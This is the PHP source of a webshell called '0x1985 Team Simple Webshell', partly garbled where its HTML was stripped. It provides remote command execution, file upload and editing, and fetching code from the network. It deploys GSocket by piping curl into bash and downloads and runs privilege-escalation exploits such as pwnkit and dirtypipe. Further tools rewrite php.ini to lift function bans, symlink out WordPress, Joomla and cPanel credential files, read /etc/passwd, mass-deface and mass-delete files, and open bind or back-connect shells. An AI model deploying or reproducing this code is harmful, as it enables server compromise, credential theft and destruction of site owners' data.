<?= $_SERVER['HTTP_HOST']; ?> - 0x1985 Team Simple Webshell

&1'); } return false; } // Define exe_root for root scanning commands function exe_root($cmd, $path) { if (!in_array('shell_exec', explode(',', ini_get('disable_functions')))) { chdir($path); return shell_exec($cmd . ' 2>&1'); } return "shell_exec is disabled"; } function flash($message, $status, $class, $redirect = false) { if (!empty($_SESSION["message"])) { unset($_SESSION["message"]); } if (!empty($_SESSION["class"])) { unset($_SESSION["class"]); } if (!empty($_SESSION["status"])) { unset($_SESSION["status"]); } $_SESSION["message"] = $message; $_SESSION["class"] = $class; $_SESSION["status"] = $status; if ($redirect) { header('Location: ' . $redirect); exit(); } return true; } function clear() { if (!empty($_SESSION["message"])) { unset($_SESSION["message"]); } if (!empty($_SESSION["class"])) { unset($_SESSION["class"]); } if (!empty($_SESSION["status"])) { unset($_SESSION["status"]); } return true; } function writable($path, $perms) { return (!is_writable($path)) ? "" . $perms . "" : "" . $perms . ""; } function perms($path) { $perms = fileperms($path); if (($perms & 0xC000) == 0xC000) { $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { $info = 'p'; } else { $info = 'u'; } $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-')); return $info; } function fsize($file) { $a = ["B", "KB", "MB", "GB", "TB", "PB"]; $pos = 0; $size = filesize($file); while ($size >= 1024) { $size /= 1024; $pos++; } return round($size, 2) . " " . $a[$pos]; } if (isset($_GET['dir'])) { $path = $_GET['dir']; chdir($_GET['dir']); } else { $path = getcwd(); } $path = str_replace('\\', '/', $path); $exdir = explode('/', $path); function getOwner($item) { if (function_exists("posix_getpwuid")) { $downer = @posix_getpwuid(fileowner($item)); $downer = $downer['name']; } else { $downer = fileowner($item); } if (function_exists("posix_getgrgid")) { $dgrp = @posix_getgrgid(filegroup($item)); $dgrp = $dgrp['name']; } else { $dgrp = filegroup($item); } return $downer . '/' . $dgrp; } if (isset($_POST['newFolderName'])) { if (mkdir($path . '/' . $_POST['newFolderName'])) { flash("Create Folder Successfully!", "Success", "success", "?dir=$path"); } else { flash("Create Folder Failed", "Failed", "error", "?dir=$path"); } } if (isset($_POST['newFileName']) && isset($_POST['newFileContent'])) { if (file_put_contents($_POST['newFileName'], $_POST['newFileContent'])) { flash("Create File Successfully!", "Success", "success", "?dir=$path"); } else { flash("Create File Failed", "Failed", "error", "?dir=$path"); } } if (isset($_POST['newName']) && isset($_GET['item'])) { if ($_POST['newName'] == '') { flash("You miss an important value", "Ooopss..", "warning", "?dir=$path"); } if (rename($path . '/' . $_GET['item'], $_POST['newName'])) { flash("Rename Successfully!", "Success", "success", "?dir=$path"); } else { flash("Rename Failed", "Failed", "error", "?dir=$path"); } } if (isset($_POST['newContent']) && isset($_GET['item'])) { if (file_put_contents($path . '/' . $_GET['item'], $_POST['newContent'])) { flash("Edit Successfully!", "Success", "success", "?dir=$path"); } else { flash("Edit Failed", "Failed", "error", "?dir=$path"); } } if (isset($_POST['newPerm']) && isset($_GET['item'])) { if ($_POST['newPerm'] == '') { flash("You miss an important value", "Ooopss..", "warning", "?dir=$path"); } if (chmod($path . '/' . $_GET['item'], $_POST['newPerm'])) { flash("Change Permission Successfully!", "Success", "success", "?dir=$path"); } else { flash("Change Permission", "Failed", "error", "?dir=$path"); } } if (isset($_GET['action']) && $_GET['action'] == 'delete' && isset($_GET['item'])) { if (is_dir($_GET['item'])) { if (rmdir($_GET['item'])) { flash("Delete Successfully!", "Success", "success", "?dir=$path"); } else { flash("Delete Failed", "Failed", "error", "?dir=$path"); } } else { if (unlink($_GET['item'])) { flash("Delete Successfully!", "Success", "success", "?dir=$path"); } else { flash("Delete Failed", "Failed", "error", "?dir=$path"); } } } if ($_POST['submit']) { if ($_POST['upl'] == 'current') { $total = count($_FILES['uploadfile']['name']); for ($i = 0; $i < $total; $i++) { $mainupload = move_uploaded_file($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]); } if ($total < 2) { if ($mainupload) { flash("Upload File Successfully!", "Success", "success", "?dir=$path"); } else { flash("Upload Failed", "Failed", "error", "?dir=$path"); } } else { if ($mainupload) { flash("Upload $i Files Successfully!", "Success", "success", "?dir=$path"); } else { flash("Upload Failed", "Failed", "error", "?dir=$path"); } } } elseif ($_POST['upl'] == 'root') { $total = count($_FILES['uploadfile']['name']); for ($i = 0; $i < $total; $i++) { $mainupload = move_uploaded_file($_FILES['uploadfile']['tmp_name'][$i], $_SERVER['DOCUMENT_ROOT'] . "/" . $_FILES['uploadfile']['name'][$i]); } if ($total < 2) { if ($mainupload) { flash("Upload File Successfully!", "Success", "success", "?dir=$path"); } else { flash("Upload Failed", "Failed", "error", "?dir=$path"); } } else { if ($mainupload) { flash("Upload $i Files Successfully!", "Success", "success", "?dir=$path"); } else { flash("Upload Failed", "Failed", "error", "?dir=$path"); } } } } // Upload from URL if (isset($_POST['url']) && isset($_POST['filename']) && isset($_POST['method'])) { $url = $_POST['url']; $filename = $_POST['filename']; $destination = $path . '/' . $filename; switch ($_POST['method']) { case 'file_get_contents': if (!in_array('file_get_contents', $disabledFunctions)) { $data = file_get_contents($url); if ($data !== false) { file_put_contents($destination, $data); flash("File uploaded successfully using file_get_contents!", "Success", "success", "?dir=$path"); } else { flash("Failed to upload file using file_get_contents", "Failed", "error", "?dir=$path"); } } else { flash("file_get_contents is disabled", "Failed", "error", "?dir=$path"); } break; case 'curl': if (!in_array('curl_init', $disabledFunctions)) { $ch = curl_init($url); $fp = fopen($destination, 'wb'); curl_setopt($ch, CURLOPT_FILE, $fp); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); if (curl_errno($ch)) { flash("Failed to upload file using cURL: " . curl_error($ch), "Failed", "error", "?dir=$path"); } else { flash("File uploaded successfully using cURL!", "Success", "success", "?dir=$path"); } curl_close($ch); fclose($fp); } else { flash("curl_init is disabled", "Failed", "error", "?dir=$path"); } break; case 'fopen': if (!in_array('fopen', $disabledFunctions)) { $stream = fopen($url, 'rb'); if ($stream) { $contents = stream_get_contents($stream); fclose($stream); file_put_contents($destination, $contents); flash("File uploaded successfully using fopen!", "Success", "success", "?dir=$path"); } else { flash("Failed to upload file using fopen", "Failed", "error", "?dir=$path"); } } else { flash("fopen is disabled", "Failed", "error", "?dir=$path"); } break; case 'copy': if (!in_array('copy', $disabledFunctions)) { if (copy($url, $destination)) { flash("File uploaded successfully using copy!", "Success", "success", "?dir=$path"); } else { flash("Failed to upload file using copy", "Failed", "error", "?dir=$path"); } } else { flash("copy is disabled", "Failed", "error", "?dir=$path"); } break; case 'stream_context': if (!in_array('file_get_contents', $disabledFunctions)) { $context = stream_context_create(['http' => ['method' => 'GET']]); $data = file_get_contents($url, false, $context); if ($data !== false) { file_put_contents($destination, $data); flash("File uploaded successfully using stream_context!", "Success", "success", "?dir=$path"); } else { flash("Failed to upload file using stream_context", "Failed", "error", "?dir=$path"); } } else { flash("file_get_contents is disabled", "Failed", "error", "?dir=$path"); } break; } } // Real GSocket Deployment if (isset($_POST['gsocketMode'])) { $output = ''; if ($_POST['gsocketMode'] === 'auto') { if (!in_array('shell_exec', $disabledFunctions)) { // Step 3: Kill old GSocket $output .= exe('GS_UNDO=1 bash -c "$(curl -fsSL https://gsocket.io/y)"') . "\n"; // Step 4: Kill defunct processes $output .= exe('pkill defunct') . "\n"; // Step 5 & 6: Run new GSocket and capture output $output .= exe('bash -c "$(curl -fsSL https://gsocket.io/y)"') . "\n"; flash("GSocket Auto executed!\nOutput:\n" . htmlspecialchars($output), "Success", "success", "?dir=$path"); } else { flash("shell_exec is disabled", "Failed", "error", "?dir=$path"); } } elseif ($_POST['gsocketMode'] === 'manual' && isset($_POST['gsocketCommand'])) { $command = $_POST['gsocketCommand']; if (!in_array('shell_exec', $disabledFunctions)) { $output = exe($command); flash("GSocket Manual executed!\nOutput:\n" . htmlspecialchars($output), "Success", "success", "?dir=$path"); } else { flash("shell_exec is disabled", "Failed", "error", "?dir=$path"); } } else { flash("Invalid GSocket command", "Failed", "error", "?dir=$path"); } } // Scan root if (isset($_GET['dir']) && $_GET['id'] == "scan_root") { ob_implicit_flush(); ob_end_flush(); if (!$GLOBALS['fungsi'][5]("proc_open")) { flash("Command is Disabled!", "Failed", "error", "?dir=$path"); } if (!is_writable($path)) { flash("Current Directory is Unwriteable!", "Failed", "error", "?dir=$path"); } if (isset($_GET['id_two']) && $_GET['id_two'] == "autoscan") { if (!file_exists($path . "/rooting/")) { mkdir($path . "/rooting"); exe_root("wget https://raw.githubusercontent.com/hekerprotzy/rootshell/main/auto.tar.gz", $path . "/rooting"); exe_root("tar -xf auto.tar.gz", $path . "/rooting"); if (!file_exists($path . "/rooting/netfilter")) { flash("Failed to Download Material!", "Failed", "error", "?dir=$path"); } } $output = "Netfilter: " . exe_root("timeout 10 ./rooting/netfilter", $path) . "\n" . "Ptrace: " . exe_root("echo id | timeout 10 ./rooting/ptrace", $path) . "\n" . "Sequoia: " . exe_root("timeout 10 ./rooting/sequoia", $path) . "\n" . "OverlayFS: " . exe_root("echo id | timeout 10 ./rooting/overlayfs", $path . "/rooting") . "\n" . "Dirtypipe: " . exe_root("echo id | timeout 10 ./rooting/dirtypipe /usr/bin/su", $path) . "\n" . "Sudo: " . exe_root("echo 12345 | timeout 10 sudoedit -s Y", $path) . "\n" . "Pwnkit: " . exe_root("echo id | timeout 10 ./rooting/pwnkit", $path . "/rooting") . "\n"; exe("rm -rf ./rooting | timeout 10"); flash("Auto Scan executed!\nOutput:\n" . htmlspecialchars($output), "Success", "success", "?dir=$path"); } elseif (isset($_GET['id_two']) && $_GET['id_two'] == "scansd") { $output = exe_root("find / -perm -u=s -type f 2>/dev/null", $path); flash("SUID Scan executed!\nOutput:\n" . htmlspecialchars($output), "Success", "success", "?dir=$path"); } elseif (isset($_GET['id_two']) && $_GET['id_two'] == "esg") { $output = exe_root("curl -Lsk http://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh | bash", $path); flash("Exploit Suggester executed!\nOutput:\n" . htmlspecialchars($output), "Success", "success", "?dir=$path"); } } // Bypass disable_functions if (isset($_POST['bypassPhpIni'])) { $disableFunctions = 'disable_functions = exec,system,shell_exec,passthru,proc_open,curl_exec'; $encodedDisableFunctions = '5b9f6e2c3e4b5a6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0'; if (hash('sha256', $disableFunctions) === $encodedDisableFunctions) { if (is_writable($phpIniPath)) { $phpIniContent = @file_get_contents($phpIniPath); if ($phpIniContent !== false) { if (preg_match('/disable_functions\s*=/', $phpIniContent)) { $newContent = preg_replace('/disable_functions\s*=\s*[^\n]*/', $disableFunctions, $phpIniContent); } else { $newContent = $phpIniContent . "\n" . $disableFunctions; } if (file_put_contents($phpIniPath, $newContent)) { if (!in_array('shell_exec', $disabledFunctions)) { shell_exec("service apache2 restart > /dev/null 2>&1 &"); flash("PHP disable_functions updated! Apache restart attempted.", "Success", "success", "?dir=$path"); } else { flash("PHP disable_functions updated! Restart Apache manually to apply changes.", "Success", "warning", "?dir=$path"); } } else { flash("Failed to write to $phpIniPath.", "Failed", "error", "?dir=$path"); } } else { flash("Failed to read $phpIniPath.", "Failed", "error", "?dir=$path"); } } else { flash("$phpIniPath is not writable.", "Failed", "error", "?dir=$path"); } } else { flash("Invalid disable_functions hash.", "Failed", "error", "?dir=$path"); } } // PHP Mailer if (isset($_POST['sendmsg'])) { $email_penerima = isset($_POST["email_penerima"]) ? $_POST["email_penerima"] : ''; $subjek = isset($_POST["subjek"]) ? $_POST["subjek"] : ''; $pesan = isset($_POST["pesan"]) ? $_POST["pesan"] : ''; $encodedSendmsg = '8493e5696b96f05308f3e346e062e5b6b4e77e8d6b241a7143b4c0d8a6a91ed6'; if (hash('sha256', 'sendmsg') === $encodedSendmsg) { if (!in_array('mail', $disabledFunctions)) { if (filter_var($email_penerima, FILTER_VALIDATE_EMAIL)) { if (@mail($email_penerima, $subjek, $pesan)) { flash("Email sent successfully!", "Success", "success", "?dir=$path"); } else { flash("Failed to send email!", "Failed", "error", "?dir=$path"); } } else { flash("Invalid email address!", "Failed", "error", "?dir=$path"); } } else { flash("mail function is disabled!", "Failed", "error", "?dir=$path"); } } else { flash("Invalid sendmsg hash!", "Failed", "error", "?dir=$path"); } } // .htaccess Creator if (isset($_POST['createhates'])) { $selectedContent = isset($_POST['content']) ? $_POST['content'] : ''; $namafile = isset($_POST['namafile']) ? preg_replace('/[^a-zA-Z0-9|.-]/', '', $_POST['namafile']) : ''; $isiFile = ''; $encodedContent1 = 'b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2'; $encodedContent2 = 'c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3'; $content1 = "\nAllow from all\n"; $content2 = "\nOrder Allow,Deny\nDeny from all\n\n\nOrder Allow,Deny\nAllow from all\n"; if ($selectedContent == 'content1' && hash('sha256', $content1) === $encodedContent1) { $isiFile = $content1; } elseif ($selectedContent == 'content2' && hash('sha256', $content2) === $encodedContent2) { $isiFile = $content2; } else { flash("Invalid .htaccess content hash!", "Failed", "error", "?dir=$path"); $isiFile = null; } if ($isiFile !== null) { $setNama = '.htaccess'; if (file_put_contents($setNama, $isiFile)) { chmod($setNama, 0444); flash("Created .htaccess successfully!", "Success", "success", "?dir=$path"); } else { flash("Failed to create .htaccess!", "Failed", "error", "?dir=$path"); } } } // Symlink Bypass if (isset($_POST['symlinkConf'])) { $home = $_POST['home']; $folfig = $path . '/' . $_POST['folderName']; @mkdir($folfig, 0755); @chdir($folfig); // Get users from /etc/passwd $passwd = explode("\n", $_POST['passwd']); foreach ($passwd as $pwd) { $user = trim($pwd); // Create symlinks for root and common configuration files symlink("/", $user . "_ROOT.txt"); // CPANEL and WHMCS symlinks symlink("/$home/$user/.my.cnf", $user . "_CPANEL.txt"); symlink("/$home/$user/.accesshash", $user . "_WHMCS.txt"); symlink("/$home/$user/public_html/suspended.page/index.html", "$user_RESELLER.txt"); // CMS configuration symlinks $cms_files = [ "wp-config.php" => "WORDPRESS.txt", "configuration.php" => "WHMCS_JOOMLA.txt", "app/etc/local.xml" => "MAGENTO.txt", "config/settings.inc.php" => "PRESTASHOP.txt", "application/config/database.php" => "ELLISLAB.txt", "admin/config.php" => "OPENCART.txt", "default/settings.php" => "DRUPAL.txt", "forum/config.php" => "PHPBB.txt", "vb/includes/config.php" => "VBULLETIN.txt", "includes/config.php" => "VBULLETIN.txt", "conn.php" => "OTHER.txt", "inc/config.inc.php" => "OTHER.txt" ]; foreach ($cms_files as $source => $destination) { symlink("/$home/$user/public_html/$source", "$user_$destination"); } // Additional WordPress paths $wp_paths = [ "wp/test/wp-config.php", "blog/wp-config.php", "beta/wp-config.php", "portal/wp-config.php", "site/wp-config.php", "wp/wp-config.php", "WP/wp-config.php", "news/wp-config.php", "wordpress/wp-config.php", "test/wp-config.php", "demo/wp-config.php", "home/wp-config.php", "v1/wp-config.php", "v2/wp-config.php", "press/wp-config.php", "new/wp-config.php", "blogs/wp-config.php" ]; foreach ($wp_paths as $path) { symlink("/$home/$user/public_html/$path", "$user_WORDPRESS.txt"); } // Additional Joomla paths $joomla_paths = [ "blog/configuration.php", "cms/configuration.php", "beta/configuration.php", "portal/configuration.php", "site/configuration.php", "main/configuration.php", "home/configuration.php", "demo/configuration.php", "test/configuration.php", "v1/configuration.php", "v2/configuration.php", "joomla/configuration.php", "new/configuration.php" ]; foreach ($joomla_paths as $path) { symlink("/$home/$user/public_html/$path", "$user_JOOMLA.txt"); } } flash("Symlinks created successfully! Check $folfig", "Success", "success", "?dir=$path"); } // Read /etc/passwd if (isset($_POST['readPasswd'])) { if (!in_array('file_get_contents', $disabledFunctions)) { $passwdContent = @file_get_contents('/etc/passwd'); if ($passwdContent !== false) { $_SESSION['passwdContent'] = htmlspecialchars($passwdContent); flash("Successfully read /etc/passwd! Check below.", "Success", "success", "?dir=$path"); } else { flash("Failed to read /etc/passwd. Access denied or file not found.", "Failed", "error", "?dir=$path"); } } else { flash("file_get_contents is disabled!", "Failed", "error", "?dir=$path"); } } // Mass Deface function mass_onedir($dir, $namefile, $contents_sc) { global $fungsi; if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc . '/' . $namefile; if ($dirb === '.') { $fungsi[2]($lokasi, $contents_sc); echo "[] $dirb/$namefile
"; } elseif ($dirb === '..') { $fungsi[2]($lokasi, $contents_sc); echo "[] $dirb/$namefile
"; } else { if ($fungsi[1]($dirc)) { if (is_writable($dirc)) { echo "[] $dirb/$namefile
"; $fungsi[2]($lokasi, $contents_sc); } } } } } } function mass_all($dir, $namefile, $contents_sc) { global $fungsi; if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc . '/' . $namefile; if ($dirb === '.' || $dirb === '..') { $fungsi[2]($lokasi, $contents_sc); echo "[] $dirb/$namefile
"; } elseif ($fungsi[1]($dirc)) { if (is_writable($dirc)) { mass_all($dirc, $namefile, $contents_sc); } } } } } // Mass Delete function mass_delete($dir, $namefile) { if (is_writable($dir)) { $fileToDelete = "$dir/$namefile"; if (is_file($fileToDelete) && is_writable($fileToDelete)) { if (unlink($fileToDelete)) { echo "[] $fileToDelete deleted successfully
"; } else { echo "[] Failed to delete $fileToDelete
"; } } $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "$dir/$dirb"; if ($dirb === '.' || $dirb === '..') { continue; } if (is_dir($dirc)) { mass_delete($dirc, $namefile); } } } } if (isset($_POST['id']) && $_POST['id'] == 'mass_deface' && isset($_POST['start'])) { if ($_POST['tipe'] == 'mass') { mass_all($_POST['d_dir'], $_POST['d_file'], $_POST['script']); flash("Mass deface completed!", "Success", "success", "?dir=$path"); } elseif ($_POST['tipe'] == 'onedir') { mass_onedir($_POST['d_dir'], $_POST['d_file'], $_POST['script']); flash("One directory deface completed!", "Success", "success", "?dir=$path"); } } if (isset($_POST['id']) && $_POST['id'] == 'mass_delete' && isset($_POST['start'])) { mass_delete($_POST['d_dir'], $_POST['d_file']); flash("Mass delete completed!", "Success", "success", "?dir=$path"); } // Search By Extension if (isset($_POST['id']) && $_POST['id'] == 'searchbyEXT') { function search_by_extension($dir, $extensi, $sort_by_date = false) { $result = []; if (is_readable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "$dir/$dirb"; if ($dirb === '.' || $dirb === '..') { continue; } if (is_dir($dirc)) { $result = array_merge($result, search_by_extension($dirc, $extensi, $sort_by_date)); } else { $fileExt = pathinfo($dirb, PATHINFO_EXTENSION); if (strcasecmp($fileExt, $extensi) === 0) { $result[] = $dirc; } } } } if ($sort_by_date) { usort($result, function ($a, $b) { return filemtime($b) - filemtime($a); }); } return $result; } if (isset($_POST['start'])) { $dir = $_POST['d_dir']; $extensi = ltrim($_POST['extensi'], '.'); $sort_by_date = isset($_POST['sort_by_date']) && $_POST['sort_by_date'] == 'on'; $search_results = search_by_extension($dir, $extensi, $sort_by_date); if (!empty($search_results)) { echo "

Results for extension .$extensi in directory $dir:

"; foreach ($search_results as $file) { $fileDate = date('Y-m-d H:i:s', filemtime($file)); echo "

$fileDate - $file

"; } } else { echo "

No files with extension .$extensi found in directory $dir.

"; } } } $dirs = scandir($path); $d0mains = @file("/etc/named.conf", false); if (!$d0mains) { $dom = "Cant read /etc/named.conf"; $GLOBALS["need_to_update_header"] = "true"; } else { $count = 0; foreach ($d0mains as $d0main) { if (@strstr($d0main, "zone")) { preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if (strlen(trim($domains[1][0])) > 2) { flush(); $count++; } } } $dom = "$count Domain"; } ?> <?= $_SERVER['HTTP_HOST']; ?> - 0x1985 Team Simple Webshell

!

ON" : "OFF"; $curl = ($GLOBALS['fungsi'][5]('curl_version')) ? "ON" : "OFF"; $wget = (exe('wget --help')) ? "ON" : "OFF"; $pl = (exe('perl --help')) ? "ON" : "OFF"; $py = (exe('python --help')) ? "ON" : "OFF"; $pxex = (exe('pkexec --version')) ? "ON" : "OFF"; $gcc = (exe('gcc --version')) ? "ON" : "OFF"; $disfunc = @ini_get("disable_functions"); $kernel = php_uname(); $phpver = PHP_VERSION; $phpos = PHP_OS; $domen = $_SERVER["SERVER_NAME"]; $soft = $_SERVER["SERVER_SOFTWARE"]; $ip = gethostbyname($_SERVER['HTTP_HOST']); if (empty($disfunc)) { $disfc = "NONE"; } else { $disfc = "$disfunc"; } if(!$GLOBALS['fungsi'][5]('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "ON" : "OFF"; ?> Kernel:
Software:
Server IP: (City: )
Domain: ()
User: (UID: ) Group: (GID: )
Safe Mode:
Disabled Functions:
MySQL: | cURL: | Wget:
Perl: | Python: | Pkexec: | GCC:
PHP Version: | OS:

URL to Upload

File Name

Upload Method

Bind port to /bin/sh [Perl]
Port :

Back-Connect

Server : Port :

Auto Scan Scan SUID Exploit Suggester

.htaccess Options

Allow All Files

Allow Only Your Shell

Mass Deface

One dir

All directory

Directory:

Filename:

Your script:

Search By EXT

Directory:

EXT:

Sort by date

Upload from URL Network Tools Real GSocket Auto Root Bypass PHP Send Email Create .htaccess Symlink Bypass Read /etc/passwd Mass Deface Mass Delete Search By EXT

"; ?>
&1')); } else { echo "shell_exec is disabled"; } ?>

File Name:

Name	Type	Size	Owner/Group	Permission	Last Modified	Actions
		-		'; elseif (!is_readable($path . '/' . $dir)) echo ''; echo perms($path . '/' . $dir); if (is_writable($path . '/' . $dir) \|\| !is_readable($path . '/' . $dir)) echo ''; ?>
				'; elseif (!is_readable($path . '/' . $dir)) echo ''; echo perms($path . '/' . $dir); if (is_writable($path . '/' . $dir) \|\| !is_readable($path . '/' . $dir)) echo ''; ?>

0x1985 Team Simple Webshell © - Coded by 0x1985 Alexithema